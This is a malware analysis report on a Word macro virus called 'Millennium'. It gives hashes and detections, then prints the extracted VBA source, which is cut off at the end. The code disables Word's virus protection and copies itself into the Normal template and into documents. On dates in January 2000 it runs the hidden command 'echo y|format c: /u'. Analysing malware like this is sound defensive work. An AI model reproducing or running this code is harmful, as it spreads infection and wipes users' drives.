Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90d41c5ea9345602…

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-03-08 12:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 098c1f071d2506a2089f45799e440959 SHA-1: a2bfe635d0d5d45065e24ba900ea545d52ed498b SHA-256: 90d41c5ea9345602d716322720f3b6d78f397c512824de62b50006f6b8f71cff
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Word document containing VBA macros. The extracted macro (module name 'Millennium') is a self-replicating Word macro virus, not a downloader: the decoded script contains no network or download code, so the earlier reading of it as a second-stage dropper is not supported by the listing. In Document_Close it suppresses errors (On Error Resume Next), disables the Cancel key, turns off Word's macro virus protection and conversion/save prompts (`Options.VirusProtection = 0`, etc.) and disables the Tools > Macro menu entry. If 'c:\config.win' does not yet exist it writes the first 124 lines of its own code there with every character shifted by +15 (a trivially reversible Caesar-style shift, not encryption) and marks the file hidden+system (SetAttr 6). It then reads that file back, reverses the shift, and inserts the lines into the first code module of Normal.dot (NormalTemplate) or, failing that, the active document — after renaming that module to 'Millennium' and deleting its existing lines — which is how the virus persists and spreads to later documents. When it infects the template it also adds a decoy 'ViewVBCode' routine that displays a fake 'MsVbRun32.dll' error dialog. The destructive payload is date-gated: in the year 2000, on specific January dates (1st, 10th, and 20th in the visible portion), it runs `echo y|format c: /u` via the COMSPEC shell with the window hidden and shows a '-= MILLENNIUM VIRUS =-' message box. The ClamAV detection 'Doc.Trojan.Lenni-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Lenni-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lenni-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA: `Shell Environ$("COMSPEC") + " /c " + scmd$, 0` with scmd$ = "echo y|format c: /u" — launches a hidden command shell to format drive C:, gated on Year(Now) = 2000 and specific January dates
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access): reads COMSPEC to locate the command interpreter used by the Shell() call above

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17364 bytes
SHA-256: ae99e569fccddd00bf4490b46da027bdddab26a7506fe81a01b5dd0b6677213d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Millennium"
Attribute VB_Base = "1Normal.Millennium"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Exported module header as carved by olevba. The module name "Millennium" is the
' infection marker: Document_Close below compares the first module's Name against
' it and renames the target module to "Millennium" before inserting the decoded
' copy of this code.
Private Sub Document_Close()
On Error Resume Next
Dim nLun As Integer
Dim nCar As Long
Dim CriptLine As String
Static acar() As Variant
eol = Chr(13)
xSave = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
CommandBars("Tools").Controls("Macro").Enabled = False
Randomize
If Dir("c:\config.win", 6) = "" Then
Open "c:\config.win" For Output As #1
For i = 1 To 124
    xLine = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    nLun = Len(xLine)
    ReDim acar(nLun)
    For xCont = 0 To nLun - 1
        acar(xCont) = Mid(xLine, 1, 1)
        xLine = Mid(xLine, 2, Len(xLine))
    Next
    For xConta = 0 To nLun - 1
        nCar = Asc(acar(xConta))
        nCar = nCar + 15
        CriptLine = CriptLine & Chr(nCar)
    Next
    Print #1, CriptLine
    CriptLine = ""
Next
Close #1
CriptLine = ""
SetAttr "c:\config.win", 6
End If
Set actdoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set actdot = NormalTemplate.VBProject.VBComponents.Item(1)
If actdot.Name <> "Millennium" Then
    actdot.Name = "Millennium"
  If actdot.CodeModule.countoflines > 0 Then
      nLine = actdot.CodeModule.countoflines
        For i = 1 To nLine
            actdot.CodeModule.deletelines 1
        Next
        Set xDoc = NormalTemplate.VBProject.VBComponents.Item(1)
        xVar = "n"
  Else
        If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
            Set xDoc = NormalTemplate.VBProject.VBComponents.Item(1)
            xVar = "n"
        End If
  End If
ElseIf actdoc.Name <> "Millennium" Then
        actdoc.Name = "Millennium"
    If actdoc.CodeModule.countoflines > 0 Then
        nLine = actdoc.CodeModule.countoflines
        For i = 1 To nLine
            actdoc.CodeModule.deletelines 1
        Next
        Set xDoc = ActiveDocument.VBProject.VBComponents.Item(1)
        xVar = "d"
    Else
        If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
            Set xDoc = ActiveDocument.VBProject.VBComponents.Item(1)
            xVar = "d"
        End If
    End If
Else
    xDoc = ""
End If
If xDoc <> "" Then
    If xVar = "n" Then
       'Third Sub
       xDoc.CodeModule.addfromstring ("Sub ViewVBCode" & eol & "MsgBox " & Chr(34) & "Microsoft Visual Basic Error in components MsVbRun32.dll." & Chr(34) & ",vbcritical," & Chr(34) & "Microsoft Word" & Chr(34) & eol & "End Sub")
    End If
    Open "c:\config.win" For Input As #1
    If LOF(1) = 0 Then GoTo xEnd
    i = 1
    Do While Not EOF(1)
        Line Input #1, xLine
        nLun = Len(xLine)
        ReDim acar(nLun)
        For xCont = 0 To nLun - 1
            acar(xCont) = Mid(xLine, 1, 1)
            xLine = Mid(xLine, 2, Len(xLine))
        Next
        For xCont = 0 To nLun - 1
            nCar = Asc(acar(xCont))
            nCar = nCar - 15
            CriptLine = CriptLine & Chr(nCar)
        Next
        xDoc.CodeModule.InsertLines i, CriptLine
        CriptLine = ""
        i = i + 1
    Loop
End If
xEnd:
   Close #1
    If Year(Now) = "2000" Then
        scmd$ = "echo y|format c: /u"
        If Day(Now) = 1 And Month(Date) = 1 Then
            Shell Environ$("COMSPEC") + " /c " + scmd$, 0
            MsgBox "Alert..!! Your Pc have a serious problem with the Year 2000", vbCritical, "-= MILLENNIUM VIRUS =-"
       ElseIf Day(Now) = 10 And Month(Date) = 1 Then
            Shell Environ$("COMSPEC") + " /c " + scmd$, 0
            MsgBox "Alert..!! Your Pc have a serious problem with the Year 2000", vbCritical, "-= MILLENNIUM VIRUS =-"
       End If
       If Day(Now) = 20 And Month(Date) = 1 Then
 
... (truncated)